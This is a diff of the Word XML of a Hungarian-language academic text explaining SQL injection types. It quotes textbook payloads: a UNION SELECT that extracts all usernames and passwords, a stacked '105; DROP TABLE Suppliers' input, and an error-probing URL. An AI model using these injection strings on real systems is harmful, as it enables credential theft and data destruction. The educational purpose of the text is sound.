+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>--</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadása </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a bemenet sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">létezik </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tábla, valamint </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oszlop:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users--</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>A lekérdezés eredménye az adatbázis összes felhasználójának neve és jelszava.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ebből adódóan kijelenthetjük, hogy a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njection napjaink leggyakoribb és legveszélyesebb sérülékenysége</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
@@ -3221,7 +3947,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc70106698"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc70610875"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3231,7 +3957,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Meghatározása</w:t>
+        <w:t>Típusai</w:t>
       </w:r>
       <w:bookmarkEnd w:id="7"/>
     </w:p>
@@ -3254,39 +3980,1922 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Az SQL Injection napjaink leggyakoribb és legveszélyesebb sérülékenysége, amely a felhasználói input elégtelen mértékű validációjából ered.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t xml:space="preserve">Továbbiakban a kódok </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>utáni felső indexben található szám</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mint hivatkozás</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megegyezik </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>az irodalomjegyzék</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ben lévő tétel sorszámával.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Stlus3"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc70610876"/>
+      <w:r>
+        <w:t>Sávon belüli</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(in-band</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, classic</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ahogy a korábbi példa szemléltette,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ikeres SQL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>njection támadás képes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>érzékeny adatok kiolvasására az adatbázisból</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Egyik l</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>egfőbb eszköze a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>z</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>UNION</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> operátor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, amely lehetővé tesz egy vagy több további</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lekérdezés végrehajtását és az eredmények hozzáfűzését az eredeti lekérdezéshez.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Sikerességének feltétele, hogy a két</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy több</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>SELECT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oszlopszáma és oszloptípusai megegyezzenek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vagy konvertálhatóak legyenek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> páronként</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Adatok kiolvasásán, lekérdezésén</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kívül</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> képes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">továbbá </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">adatbázis béli adatok </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>törlésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> módosítására, beszúrására és frissítésére, ha az alábbi sémát vesszük alapul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>105; DROP TABLE Suppliers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tényleges </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lekérdezés </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SELECT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>FROM</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>WHERE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>UserId</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>105;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>DROP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>TABLE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Su</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ppliers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> lesz.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Ez a támadási forma a pontosvessző </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SQL béli </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">funkcióját használja </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ki</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> halmozott lekérdezések indításához. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">További </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>lehetőség</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> amikor </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a támadó </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>SQL lekérdezéseken keresztül az adatbázis-kiszolgáló által dobott hibaüzenetekre támaszkodva gyűjt információkat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (error-based)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ezzel feltérképezve a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">adatbázis </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szerkezetét.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Például</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ha a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>https://www.example.beaglesecurity.com/gallery.php?id=6'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>3</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>URL megadása esetén a szerver a hibát SQL szintaxisban adja vissza, akkor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">többlépcsős lekérdezésen keresztül az adatok </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szintén</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kinyerhető</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ek.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="567"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ez</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a típus</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ok</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tehát azért </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>„</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>sávon belüli</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ek</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, mert a támadó ugyanazt a kommunikációs csatornát képes használni a támadás elindítására és az eredmények gyűjtésére.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Továbbá</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> „klasszikus”, mert </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a legkedveltebb támadási lehetőséget foglalja magába, eredményeket pedig gyorsan lehet kinyerni általa</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, ellentétben a következő fajtával.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Stlus3"/>
-        <w:ind w:left="567" w:hanging="567"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc70106699"/>
-      <w:r>
-        <w:t>Példa</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc70610877"/>
+      <w:r>
+        <w:t>Vak (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>blind</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, inferential</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SQLi</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
